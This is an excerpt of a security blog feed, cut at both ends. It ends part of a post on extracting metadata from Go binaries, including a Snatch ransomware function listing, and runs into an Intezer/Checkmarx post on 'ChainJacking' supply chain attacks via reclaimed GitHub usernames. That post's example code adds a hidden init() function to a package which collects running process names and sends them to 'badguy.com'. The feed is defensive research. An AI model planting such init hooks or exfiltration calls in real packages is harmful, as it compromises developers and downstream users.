receiver of &lt;code&gt;decoder&lt;/code&gt;, and the name of &lt;code&gt;unmarshal&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Check if the found function has a non-nil &lt;code&gt;Entry&lt;/code&gt; field. If it does, report
as vulnerable. Otherwise, report as not vulnerable.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Now, this approach is not perfect. We are standing on the shoulders of the Go
compiler&amp;rsquo;s dead-code elimination logic to remove code that&amp;rsquo;s not reachable. It
is possible that the code is never executed in the binary but the compiler
failed to eliminate it, which would result in a false positive. It is possible
to reduce this false positive further but it would need to create call graphs
to see if the code is reachable. This is out of scope for this post.&lt;/p&gt;
&lt;h2&gt;Source Code Map&lt;span class="hx:absolute hx:-mt-20" id="source-code-map"&gt;&lt;/span&gt;
&lt;a href="#source-code-map" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;With the data extracted using the &lt;code&gt;debug&lt;/code&gt; package, there are some other
interesting things we can do. Remember that the PCLN table is used to map a
process counter to a specific line in a source code file. This means that the
binary has information about the structure of the source code. What we just
need to do is extract it and present it in a friendlier way. As I have
described the process in a
&lt;a href="https://tcm1911.github.io/posts/pclntab-function-recovery/"target="_blank" rel="noopener"&gt;previous blog post&lt;/a&gt;,
this will be a summarized version. In an earlier section, the &lt;code&gt;Func&lt;/code&gt; type was
introduced that holds symbol information about a function. Two of the fields
are pointers to where the code of the function starts and ends. This means we
know where the first instruction starts and the last instruction ends for the
method. The &lt;code&gt;Table&lt;/code&gt; structure has a method for resolving a process counter to
both a line number and a source code file name. This gives us of way to
determine the first and last line number of a function in the source code. One
may naively assume that we can just put the entry and the end field values into
the function and it will return what we want. Unfortunately, this is not the
case. The entry works fine but issues sometimes occur with the last
instruction. The compiler adds code to the end of each function (this code
requests more stack space) which can throw off the information. So the best we
can do is to estimate where the end is by checking all instructions in the
function and assuming that the largest line number in the same file as the
starting line is the end of the function. This method isn&amp;rsquo;t perfect as inline
functions can break this assertion. The next step is to get the location of
each instruction in the function. For x86 this isn&amp;rsquo;t straightforward because
they can be one to 15 bytes long. This means that the only way of getting the
location of each instruction is to disassemble it. The Go team maintains a
package named &lt;a href="https://pkg.go.dev/golang.org/x/arch"target="_blank" rel="noopener"&gt;&lt;code&gt;arch&lt;/code&gt;&lt;/a&gt; that can
disassemble x86, ARM, and PowerPC. The package is used by the Go tool
&lt;code&gt;objdump&lt;/code&gt;. Another hack that can be used is to just assume that each
instruction is say for example four bytes long and resolve the line for every
four-bytes. The process counter to line mapping function does not care if the
passed in process counter is right in the middle of an instruction… With the
file names and line numbers extracted we can just organize the data and present
it. Here is for example the extracted data for a &lt;code&gt;gofmt&lt;/code&gt; binary. It only shows
the data for the main module. The first line gives the name of the package and
the path to the folder when it was compiled. Next, each file is listed. Under
each file, the function is listed in the sorted order of the starting line
number. The function line also includes an estimated ending line of the
function and estimated lines of code; the first line is the function
definition. In the code snippet below we can see that one file is named
&lt;code&gt;&amp;lt;autogenerated&amp;gt;&lt;/code&gt;. This is for code generated by the compiler. Another thing we
can see in the output is some functions with &lt;code&gt;dwrap&lt;/code&gt; in the name, for example,
&lt;code&gt;processFile·dwrap·1&lt;/code&gt;. These are functions generated by the compiler for
&lt;a href="https://github.com/golang/go/blob/f58c78a5771570667b26e8c74faa017bd4c2c448/src/cmd/gofmt/gofmt.go#L90"target="_blank" rel="noopener"&gt;defer calls&lt;/a&gt;.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;Package main: /usr/lib/go/src/cmd/gofmt
File: &amp;lt;autogenerated&amp;gt;
(*simplifier)Visit Lines: 1 to 1 (0)
File: gofmt.go
init Lines: 29 to 53 (24)
usage Lines: 64 to 76 (12)
isGoFile Lines: 76 to 83 (7)
processFile Lines: 83 to 163 (80)
processFile·dwrap·1 Lines: 90 to 166 (76)
visitFile Lines: 166 to 176 (10)
main Lines: 176 to 184 (8)
gofmtMain Lines: 184 to 232 (48)
gofmtMain·dwrap·2 Lines: 195 to 234 (39)
diffWithReplaceTempFile Lines: 234 to 251 (17)
replaceTempFilename Lines: 251 to 276 (25)
backupFile Lines: 276 to 298 (22)
File: internal.go
parse Lines: 23 to 94 (71)
parsefunc1 Lines: 45 to 69 (24)
parsefunc2 Lines: 69 to 80 (11)
format Lines: 94 to 175 (81)
File: rewrite.go
initRewrite Lines: 19 to 32 (13)
initRewritefunc1 Lines: 31 to 38 (7)
parseExpr Lines: 38 to 57 (19)
rewriteFile Lines: 57 to 81 (24)
rewriteFilefunc1 Lines: 64 to 85 (21)
set Lines: 85 to 117 (32)
setfunc1 Lines: 90 to 99 (9)
apply Lines: 117 to 152 (35)
isWildcard Lines: 152 to 160 (8)
match Lines: 160 to 248 (88)
subst Lines: 248 to 308 (60)
File: simplify.go
simplifierVisit Lines: 15 to 130 (115)
simplifiersimplifyLiteral Lines: 102 to 133 (31)
simplify Lines: 133 to 141 (8)
removeEmptyDeclGroups Lines: 141 to 152 (11)
isEmpty Lines: 152 to 164 (12)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;One may wonder what this information can be used for. One thing it can be used
for is to detect changes in Go applications. Another place where it is useful
is for the analysis of suspicious Go binaries by for example identifying if the
application is an open-source program or malware. The snippet below is from a
ransomware called Snatch that has been around for a few years. From the
function names, we can get an idea of what the binary might be doing. We see
both function names that suggest scanning folders for files and encrypting. One
thing that this ransomware does is to install itself as a Windows service that
is started in &lt;em&gt;Safe boot mode&lt;/em&gt;. After it has installed itself as a service, it
reboots the machine into safe mode. We can see function names in the output
that suggest this behavior.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;Package main: /home/go/src/locker
File: config.go
init Lines: 39 to 246 (207)
File: dirs.go
scanDir Lines: 10 to 85 (75)
scanDirfunc1 Lines: 11 to 13 (2)
File: files.go
encryptFile Lines: 13 to 120 (107)
encryptFilefunc1 Lines: 14 to 16 (2)
File: main.go
main Lines: 24 to 91 (67)
runInstance Lines: 91 to 107 (16)
File: misc.go
decodeString Lines: 15 to 37 (22)
makeFile Lines: 37 to 60 (23)
makeFilefunc1 Lines: 43 to 68 (25)
makeBatFile Lines: 60 to 67 (7)
runBatFile Lines: 67 to 92 (25)
runBatFilefunc1 Lines: 68 to 70 (2)
isSafeBoot Lines: 92 to 115 (23)
deleteShadowCopy Lines: 115 to 135 (20)
selfRemove Lines: 135 to 158 (23)
randomBatFileName Lines: 158 to 171 (13)
Copy Lines: 171 to 188 (17)
File: queue.go
(*Queue)Push Lines: 20 to 33 (13)
(*Queue)Pop Lines: 33 to 45 (12)
runWorkers Lines: 45 to 64 (19)
File: services.go
(*myService)Execute Lines: 13 to 56 (43)
getServicesNamesList Lines: 56 to 88 (32)
stopServices Lines: 88 to 113 (25)
setupServiceSafeBoot Lines: 113 to 138 (25)
safeModeEnabled Lines: 138 to 161 (23)
installService Lines: 161 to 188 (27)
reboot Lines: 188 to 204 (16)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;Wrap-up&lt;span class="hx:absolute hx:-mt-20" id="wrap-up"&gt;&lt;/span&gt;
&lt;a href="#wrap-up" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;There is much more metadata, for example,
&lt;a href="https://tcm1911.github.io/posts/extracting-go-types/"target="_blank" rel="noopener"&gt;types&lt;/a&gt; and the build-id,
that can be extracted from Go binaries. If we were to cover all of it, this
post would be way too long. Hopefully, this has shown that Go binaries are rich
with metadata and that binary analysis isn&amp;rsquo;t that bad. For readers that would
like to do some of their own binary analysis but do not want to write all the
code to extract the data, there are libraries available. The
&lt;a href="https://github.com/goretk"target="_blank" rel="noopener"&gt;Go Reverse Engineering Tool Kit&lt;/a&gt; can extract all
the data covered in this post, allowing just your imagination with what to do
with the data.&lt;/p&gt;</description></item><item><title>New Type of Supply Chain Attack Could Put Popular Admin Tools at Risk</title><link>https://research.intezer.com/blog/2021/11/chainjacking-supply-chain-attack-puts-popular-admin-tools-at-risk/</link><pubDate>Tue, 16 Nov 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/11/chainjacking-supply-chain-attack-puts-popular-admin-tools-at-risk/</guid><description>
&lt;p&gt;Research between Intezer and &lt;a href="https://checkmarx.com/"target="_blank" rel="noopener"&gt;Checkmarx&lt;/a&gt; describes
ChainJacking, a type of software supply chain attack that could be potentially
exploited by threat actors and puts common admin tools at risk.&lt;/p&gt;
&lt;p&gt;We have identified a number of open-source Go packages that are susceptible to
ChainJacking given that some of these vulnerable packages are embedded in
popular admin tools.&lt;/p&gt;
&lt;p&gt;The nature of transitive trust between open-source security (OSS) makes this
technique highly difficult to defend at the developer level using open-source
software.&lt;/p&gt;
&lt;p&gt;To help the infosec community protect against this type of attack, we developed
an &lt;a href="https://github.com/checkmarx/chainjacking"target="_blank" rel="noopener"&gt;open-source tool&lt;/a&gt; which can be
used to scan source code and detect if packages downloaded from GitHub and
other sources are vulnerable. You can also scan the binaries of any program in
&lt;a href="https://analyze.intezer.com/"target="_blank" rel="noopener"&gt;Intezer Analyze&lt;/a&gt; to make sure they don&amp;rsquo;t contain
vulnerable packages or ChainJacking vulnerable Git repositories.&lt;/p&gt;
&lt;h2&gt;Intro&lt;span class="hx:absolute hx:-mt-20" id="intro"&gt;&lt;/span&gt;
&lt;a href="#intro" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;An attacker slipping through the cracks between the designs of GitHub and Go
Package Manager could allow them to take control over popular Go packages,
poison them, and infect both developers and users.&lt;/p&gt;
&lt;p&gt;Go build tools provide an easy way for developers to download and use
open-source libraries in their projects. Compared to other languages such as
Python and Rust, Go doesn&amp;rsquo;t use a central repository where libraries can be
downloaded from. Instead, the Go tooling pulls code packages straight from
version control systems such as GitHub¹.&lt;/p&gt;
&lt;p&gt;GitHub is the largest source-code repository on the internet, with the majority
of Go packages hosted on it. One feature GitHub provides is allowing users to
change usernames.&lt;/p&gt;
&lt;p&gt;The change of username process is quick and simple. A warning lets you know
that all traffic for the old repository&amp;rsquo;s URL will be redirected to the new
one.&lt;/p&gt;
&lt;p&gt;What GitHub doesn&amp;rsquo;t mention in this alert is an important implication that it
does list in its documentation:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;After changing your username, your old username becomes available for anyone
else to claim.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This means that an attacker can easily claim the abandoned username and start
serving up malicious code to anyone who downloads the package, relying on the
credibility gained by its former owner. Doing so in a Go package repository
could result in a chain reaction that substantially widens the code
distribution and infects large numbers of downstream products.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s lay out the blueprint for this relatively simple yet potentially
catastrophic attack vector.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;¹ We are focusing on Go but other package managers like NPM also allow code
pulling from version control systems which makes them susceptible to this kind
of attack as well.&lt;/p&gt;
&lt;h2&gt;Direct ChainJacking&lt;span class="hx:absolute hx:-mt-20" id="direct-chainjacking"&gt;&lt;/span&gt;
&lt;a href="#direct-chainjacking" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Let&amp;rsquo;s give an example scenario. A developer named Annastacia opens a GitHub
account under the username &lt;code&gt;Annastacia&lt;/code&gt;. She then publishes a useful Go package
in a repository under the name &lt;code&gt;useful&lt;/code&gt;. Anyone who wants to use this package
can either download and install it via &lt;code&gt;go get github.com/Annastacia/useful&lt;/code&gt;,
or import it into their code via &lt;code&gt;import github.com/Annastacia/useful&lt;/code&gt;. This
action will add an entry to the &lt;code&gt;go.mod&lt;/code&gt; file, allowing the tooling provided by
Go to easily update the package when new versions are released.&lt;/p&gt;
&lt;p&gt;Some time has now gone by and thanks to its usefulness, the package has become
popular. Annastacia decides that she wants a shorter name for her repository
and with just a few clicks she changes her GitHub username to &lt;code&gt;Anna&lt;/code&gt;.
Subsequently, two things will happen:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The username &lt;code&gt;Annastacia&lt;/code&gt; is now available to be registered by anyone else.&lt;/li&gt;
&lt;li&gt;All requests for &lt;code&gt;github.com/Annastacia/useful&lt;/code&gt; are now redirected to
&lt;code&gt;github.com/Anna/useful&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;All current packages using &lt;code&gt;github.com/Annastacia/useful&lt;/code&gt; can still use it as
before, so nothing breaks and there are no user complaints as of yet².&lt;/p&gt;
&lt;p&gt;If a malicious actor manages to claim the &lt;code&gt;Annastacia&lt;/code&gt; username, they can then
publish their own malicious code under the repository name &lt;code&gt;useful&lt;/code&gt;. This
action breaks the redirect to &lt;code&gt;Anna/useful&lt;/code&gt; and GitHub now serves the threat
actor&amp;rsquo;s malicious code from &lt;code&gt;github.com/Annastacia/useful&lt;/code&gt;, which could
compromise anyone using the old URL.&lt;/p&gt;
&lt;p&gt;The concept is rather simple. Now, every new installation of this package can
potentially infect the installing developer&amp;rsquo;s machine. Even more potentially
damaging, any new package or third-party product written in the future which
depends on this infected package will also cause infections on any machine it
is installed on.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;² Given that the owner dealt with the Go module configuration the right way.&lt;/p&gt;
&lt;h2&gt;Meet go.mod &amp;amp; go.sum&lt;span class="hx:absolute hx:-mt-20" id="meet-gomod--gosum"&gt;&lt;/span&gt;
&lt;a href="#meet-gomod--gosum" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In the attack scenario described above, the victim&amp;rsquo;s machine is infected by
directly calling for the poisoned package. This is assuming the victim called
Annastacia&amp;rsquo;s old repository URL and not the new one. As previously mentioned, a
successful attack can also occur when the poisoned package is called
indirectly, as a dependency of another package, preferably a popular one.
However, this kind of attack raises new challenges for the attacker.&lt;/p&gt;
&lt;p&gt;Dependencies in a Go project are managed by two files, &lt;code&gt;go.mod&lt;/code&gt; and &lt;code&gt;go.sum&lt;/code&gt;.
The &lt;code&gt;go.mod&lt;/code&gt; file holds a complete list of the module&amp;rsquo;s dependencies and their
versions, while the &lt;code&gt;go.sum&lt;/code&gt; file holds a complete list of the module&amp;rsquo;s
dependencies, their versions, and a checksum of the package.&lt;/p&gt;
&lt;p&gt;Looking at this from the viewpoint of an attacker, if they manage to take
control over a package, found in the &lt;code&gt;go.mod&lt;/code&gt; and &lt;code&gt;go.sum&lt;/code&gt; files of a popular
package, and poison it while leaving it in the same version, the attack will
fail due to a checksum mismatch³.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;³ It will most likely fail even before this point because Go tooling will pull
the cached package and not access the poisoned repository.&lt;/p&gt;
&lt;p&gt;For an attack to succeed, they must publish a new version of the package and in
some way, lure the owner of the package to update its dependencies. This is a
significant challenge for the attacker with the obvious solution being a manual
pull request, or in case the GitHub repository is configured that way, an
automatic pull request from GitHub&amp;rsquo;s dependabot.&lt;/p&gt;
&lt;h2&gt;Potential Impact&lt;span class="hx:absolute hx:-mt-20" id="potential-impact"&gt;&lt;/span&gt;
&lt;a href="#potential-impact" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;We believe that ChainJacking has the potential to cause damage equivalent to
the attack on SolarWinds, since some of the vulnerable Go packages we found are
used as dependencies in popular admin tools designed to run with high
privileges.&lt;/p&gt;
&lt;h2&gt;Practical Example&lt;span class="hx:absolute hx:-mt-20" id="practical-example"&gt;&lt;/span&gt;
&lt;a href="#practical-example" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Let&amp;rsquo;s look at a commonly used open-source library and show what could happen if
it was susceptible to a take-over. A popular third-party logging package is
called Logrus (&lt;code&gt;github.com/sirupsen/logrus&lt;/code&gt;). If this package is vulnerable, it
can be used to inject malicious code into any applications compiled with the
&amp;ldquo;old&amp;rdquo; repository. In this mock scenario, in addition to code provided by Go
standard library, we are also using the third-party package
&lt;code&gt;github.com/mitchellh/go-ps&lt;/code&gt;. This package allows for enumerating the running
processes on the machine and is platform independent. The package has been used
by multiple malware written in Go. Also, we can use go-binddata to embed an
alternative payload.&lt;/p&gt;
&lt;p&gt;The following code was added to the end of one of the files in the package.
First, a new &lt;code&gt;init&lt;/code&gt; function was created. Go allows for multiple &lt;code&gt;init&lt;/code&gt;
functions to exist in the same package. All &lt;code&gt;init&lt;/code&gt; functions are executed
before the &lt;code&gt;main&lt;/code&gt; function is executed in a non-deterministic order.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-go" data-lang="go"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kd"&gt;func&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;init&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;ok&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;collectData&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;ok&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;writeAndExecute&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="kd"&gt;func&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;collectData&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;bool&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;p&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;ps&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Processes&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;nil&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;var&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;d&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;for&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;_&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;v&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;range&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;p&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;d&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;append&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;v&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Executable&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;buf&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;base64&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;RawURLEncoding&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;EncodeToString&lt;/span&gt;&lt;span class="p"&gt;([]&lt;/span&gt;&lt;span class="nb"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;strings&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;&amp;#34;|&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;resp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;http&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;fmt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Sprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;https://badguy.com/?s1=%s&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;nil&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
